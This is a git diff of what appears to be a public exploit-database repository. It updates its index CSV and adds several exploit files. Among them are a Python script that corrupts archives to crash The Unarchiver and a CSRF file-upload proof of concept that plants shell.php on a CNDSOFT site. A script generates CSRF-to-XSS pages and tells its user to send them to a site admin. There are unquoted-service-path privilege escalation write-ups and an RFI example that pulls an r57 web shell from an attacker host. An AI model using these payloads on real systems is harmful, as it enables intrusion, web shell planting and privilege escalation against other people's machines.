diff --git a/files.csv b/files.csv
index 642d2542c..688021e71 100755
--- a/files.csv
+++ b/files.csv
@@ -3946,7 +3946,7 @@ id,file,description,date,author,platform,type,port
4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0
4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0
4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
-4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0
+4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0
4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0
@@ -3964,14 +3964,14 @@ id,file,description,date,author,platform,type,port
4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0
4309,platforms/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0
4310,platforms/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0
-4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
+4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass",2007-08-23,NetJackal,windows,local,0
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0
4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0
-4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0
+4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0
4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
@@ -4000,7 +4000,7 @@ id,file,description,date,author,platform,type,port
4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
-4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0
+4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0
4348,platforms/windows/remote/4348.c,"PPStream - (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0
4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0
@@ -4012,7 +4012,7 @@ id,file,description,date,author,platform,type,port
4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0
4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0
4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0
-4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)",2007-09-03,"David Vaartjes",multiple,dos,0
+4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0
4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0
4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0
@@ -4081,10 +4081,10 @@ id,file,description,date,author,platform,type,port
4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0
4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0
-4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow",2007-09-19,void,windows,remote,143
+4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow",2007-09-19,void,windows,remote,143
4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
-4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0
+4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",multiple,dos,0
4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0
4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0
4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0
@@ -4115,7 +4115,7 @@ id,file,description,date,author,platform,type,port
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
-4463,platforms/php/webapps/4463.txt,"Integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
+4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0
4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0
4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
@@ -24162,6 +24162,7 @@ id,file,description,date,author,platform,type,port
26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0
26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0
26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
+40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0
26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
@@ -36598,7 +36599,7 @@ id,file,description,date,author,platform,type,port
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
-40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@@ -36652,7 +36653,7 @@ id,file,description,date,author,platform,type,port
40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0
40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0
-40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
@@ -36675,7 +36676,19 @@ id,file,description,date,author,platform,type,port
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
+40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
+40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
+40579,platforms/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40580,platforms/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40581,platforms/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40582,platforms/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40585,platforms/windows/local/40585.txt,"Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40583,platforms/windows/local/40583.txt,"Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40584,platforms/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",php,webapps,0
+40586,platforms/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40587,platforms/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
diff --git a/platforms/osx/dos/40570.py b/platforms/osx/dos/40570.py
new file mode 100755
index 000000000..a11bbf6cc
--- /dev/null
+++ b/platforms/osx/dos/40570.py
@@ -0,0 +1,39 @@
+# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
+# Date: 10-17-2016
+# Exploit Author: Antonio Z.
+# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
+# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
+# Version: 3.11.1
+# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
+
+# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
+
+import os, struct, sys
+from mmap import mmap
+
+if len(sys.argv) <= 1:
+ print "Usage: python Local_Crash_PoC.py [file name]"
+ exit()
+
+file_name = sys.argv[1]
+file_mod = open(file_name, 'r+b')
+file_hash = file_mod.read()
+
+def get_extension(file_name):
+ basename = os.path.basename(file_name)
+ extension = '.'.join(basename.split('.')[1:])
+ return '.' + extension if extension else None
+
+def file_maping():
+ maping = mmap(file_mod.fileno(),0)
+ maping.seek(2)
+ maping.write_byte(struct.pack('B', 255))
+ maping.close()
+
+new_file_name = "Local_Crash_PoC" + get_extension(file_name)
+
+os.popen('cp ' + file_name + ' ' + new_file_name)
+file_mod = open(new_file_name, 'r+b')
+file_maping()
+file_mod.close()
+print '[+] ' + 'Created file: ' + new_file_name
\ No newline at end of file
diff --git a/platforms/php/webapps/40575.html b/platforms/php/webapps/40575.html
new file mode 100755
index 000000000..7f2e23d12
--- /dev/null
+++ b/platforms/php/webapps/40575.html
@@ -0,0 +1,159 @@
+*=========================================================================================================
+# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
+# Author: Besim
+# Google Dork: -
+# Date: 19/10/2016
+# Type: webapps
+# Platform : PHP
+# Vendor Homepage: -
+# Software Link: http://www.phpexplorer.com/Goster/1227
+# Version: 2.3
+*=========================================================================================================
+
+
+Vulnerable URL and Parameter
+========================================
+
+Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
+
+Vulnerable Parameter = &mesaj_baslik
+
+
+TECHNICAL DETAILS & POC & POST DATA
+========================================
+
+POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
+Gecko/20100101 Firefox/49.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
+——
+Content-Type: multipart/form-data;
+boundary=---------------------------5035863528338
+Content-Length: 1037
+
+-----------------------------5035863528338
+Content-Disposition: form-data; name="utf8"
+
+✓
+-----------------------------5035863528338
+Content-Disposition: form-data; name="authenticity_token"
+
+CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
+-----------------------------5035863528338
+Content-Disposition: form-data; name="kullanici_adi"
+
+meryem
+-----------------------------5035863528338
+Content-Disposition: form-data; name="kullanici_sifresi"
+
+meryem
+-----------------------------5035863528338
+Content-Disposition: form-data; name="kullanici_mail_adresi"
+m@yop.com
+-----------------------------5035863528338
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+30000
+-----------------------------5035863528338
+Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
+Content-Type: application/octet-stream
+**
+-----------------------------5035863528338
+Content-Disposition: form-data; name="personel_maasi"
+
+5200
+-----------------------------5035863528338--
+
+
+*CSRF PoC - File Upload (Shell.php)*
+
+========================================
+
+
+
+
+
+
+
+
+
+========================================
+
+*Access File : *http://www.site_name/path/personel_resimleri/shell.php
+
+
+RISK
+========================================
+
+Attacker can arbitrary file upload.
+
+
+--
+
+Besim ALTINOK
+
diff --git a/platforms/php/webapps/40576.py b/platforms/php/webapps/40576.py
new file mode 100755
index 000000000..3a1c6b95e
--- /dev/null
+++ b/platforms/php/webapps/40576.py
@@ -0,0 +1,73 @@
+# Exploit Title: XhP CMS 0.5.1 - Cross-Site Request Forgery to Persistent Cross-Site Scripting
+# Exploit Author: Ahsan Tahir
+# Date: 19-10-2016
+# Software Link: https://sourceforge.net/projects/xhp/
+# Vendor: https://sourceforge.net/projects/xhp/
+# Google Dork: inurl:Powered by XHP CMS
+# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
+# Website: www.ahsan-tahir.com
+# Category: webapps
+# Version: 0.5.1
+# Tested on: [Kali Linux 2.0 | Windows 8.1]
+# Email: mrahsan1337@gmail.com
+
+import os
+import urllib
+
+if os.name == 'nt':
+ os.system('cls')
+else:
+ os.system('clear')
+
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-=-=-=+
+| __ ___ ____ ____ __ __ ____ |
+| \ \/ / |__ | _ \ / ___| \/ / ___| |
+| \ /| '_ \| |_) | | | | |\/| \___ \ |
+| / \| | | | __/ | |___| | | |___) | |
+| /_/\_\_| |_|_| \____|_| |_|____/ |
+| > XhP CMS 0.5.1 - CSRF to Persistent XSS |
+| > Exploit Author & Script Coder: Ahsan Tahir|
++=====-----=====-----======-----=====---==-=-=+
+'''
+def xhpcsrf():
+
+ print banner
+
+ url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
+
+ csrfhtmlcode = '''
+
+
+
+
+
+
+
+
+ ''' % url
+
+ print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
+
+ print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
+ extension = ".html"
+ name = raw_input(" Filename: ")
+ filename = name+extension
+ file = open(filename, "w")
+
+ file.write(csrfhtmlcode)
+ file.close()
+ print(" [+] Your exploit is saved as %s")%filename
+ print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url)
+ print("")
+
+xhpcsrf()
\ No newline at end of file
diff --git a/platforms/php/webapps/40584.txt b/platforms/php/webapps/40584.txt
new file mode 100755
index 000000000..9588c9954
--- /dev/null
+++ b/platforms/php/webapps/40584.txt
@@ -0,0 +1,77 @@
+# Exploit Title: Intel(R) PROSet/Wireless WiFi Software - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 15.01.1000.0927
+# Tested on: Windows 7 Professional
+
+The Intel(R) PROSet/Wireless WiFi Software installs 2 services with unquoted service paths.
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
+Rebooting the system or restarting either service will run the malicious executable with elevated privileges.
+
+This was tested on version 15.01.1000.0927, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc EvtEng
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: EvtEng
+
+ TYPE : 10 WIN32_OWN_PROCESS
+
+ START_TYPE : 2 AUTO_START
+
+ ERROR_CONTROL : 1 NORMAL
+
+ BINARY_PATH_NAME : C:\Program Files\Intel\WiFi\bin\EvtEng.exe
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : Intel(R) PROSet/Wireless Event Log
+
+ DEPENDENCIES :
+
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc RegSrvc
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: RegSrvc
+
+ TYPE : 10 WIN32_OWN_PROCESS
+
+ START_TYPE : 2 AUTO_START
+
+ ERROR_CONTROL : 1 NORMAL
+
+ BINARY_PATH_NAME : C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : Intel(R) PROSet/Wireless Registry Service
+
+ DEPENDENCIES : RPCSS
+
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/php/webapps/4463.txt b/platforms/php/webapps/4463.txt
index 70e89d223..fa266a097 100755
--- a/platforms/php/webapps/4463.txt
+++ b/platforms/php/webapps/4463.txt
@@ -11,7 +11,7 @@ Download: http://sourceforge.net/project/showfiles.php?group_id=191355
------------------------
Exploit:
-includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
+includes/archive/archive_topic.php?phpbb_root_path=http://attacker/shells/r57.txt?
------------------------
diff --git a/platforms/php/webapps/4509.txt b/platforms/php/webapps/4509.txt
index 84cc32ef2..716ddbf5f 100755
--- a/platforms/php/webapps/4509.txt
+++ b/platforms/php/webapps/4509.txt
@@ -1,5 +1,5 @@
TikiWiki 1.9.8 Remote PHP Injection Vulnerability
-Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
+Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
# milw0rm.com [2007-10-10]
diff --git a/platforms/windows/dos/40536.py b/platforms/windows/dos/40536.py
index 0c86cf721..7d97130d4 100755
--- a/platforms/windows/dos/40536.py
+++ b/platforms/windows/dos/40536.py
@@ -1,7 +1,5 @@
-
-
'''
-#Hi guys
+
#Title: Firefox 49.0.1 crash Denial of Service
#Date: 15 Oct 2016
#Author: sultan albalawi
@@ -10,7 +8,7 @@
#Open link in firefox
#Double click on the Click You will see the report that there are crach
-#thanks
+
.........................................................................
'''
diff --git a/platforms/windows/local/40528.txt b/platforms/windows/local/40528.txt
index 5f16679b5..f7dcdad4c 100755
--- a/platforms/windows/local/40528.txt
+++ b/platforms/windows/local/40528.txt
@@ -3,9 +3,8 @@
# Date: 13/10/2016
# Author: Amir.ght
# Vendor Homepage: https://www.hotspotshield.com
-# Software Link:
-https://www.hotspotshield.com/download/
-#version : 6.0.3 (Latest)
+# Software Link: https://www.hotspotshield.com/download/
+# version : 6.0.3 (Latest)
# Tested on: Windows 7
##########################################################################
diff --git a/platforms/windows/local/40539.txt b/platforms/windows/local/40539.txt
index 6ff977a3e..b6e999707 100755
--- a/platforms/windows/local/40539.txt
+++ b/platforms/windows/local/40539.txt
@@ -1,12 +1,10 @@
#########################################################################
-# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path
-Privilege Escalation
+# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
-# Software Link:
-http://www.netgate.sk/download/download.php?id=4
-#version : build 16.0.205 (Latest)
+# Software Link: http://www.netgate.sk/download/download.php?id=4
+# Version : build 16.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
diff --git a/platforms/windows/local/40540.txt b/platforms/windows/local/40540.txt
index fc1216890..46e6f5f73 100755
--- a/platforms/windows/local/40540.txt
+++ b/platforms/windows/local/40540.txt
@@ -1,12 +1,10 @@
#########################################################################
-# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path
-Privilege Escalation
+# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
-# Software Link:
-http://www.netgate.sk/download/download.php?id=11
-#version : build 23.0.305 (Latest)
+# Software Link: http://www.netgate.sk/download/download.php?id=11
+# Version : build 23.0.305 (Latest)
# Tested on: Windows 7
##########################################################################
diff --git a/platforms/windows/local/40577.txt b/platforms/windows/local/40577.txt
new file mode 100755
index 000000000..5b9d84f90
--- /dev/null
+++ b/platforms/windows/local/40577.txt
@@ -0,0 +1,33 @@
+#########################################################################
+# Exploit Title: IObit Advanced SystemCare Unquoted Service Path Privilege Escalation
+# Date: 19/10/2016
+# Author: Ashiyane Digital Security Team
+# Vendor Homepage: http://www.iobit.com/en/index.php
+# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php#
+# version : 10.0.2 (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+IObit Advanced SystemCare installs a service with an unquoted service path
+To properly exploit this vulnerability, the local attacker must insert
+an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc AdvancedSystemCareService10
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AdvancedSystemCareService10
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
+ LOAD_ORDER_GROUP : System Reserved
+ TAG : 1
+ DISPLAY_NAME : Advanced SystemCare Service 10
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+################################################
+######### Ashiyane Digital Security Team ############
+########## exploit by: Amir.ght #####################
+################################################
diff --git a/platforms/windows/local/40579.txt b/platforms/windows/local/40579.txt
new file mode 100755
index 000000000..d3c5c3389
--- /dev/null
+++ b/platforms/windows/local/40579.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Intel(R) Management Engine Components - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 8.0.1.1399
+# Tested on: Windows 7 Professional
+
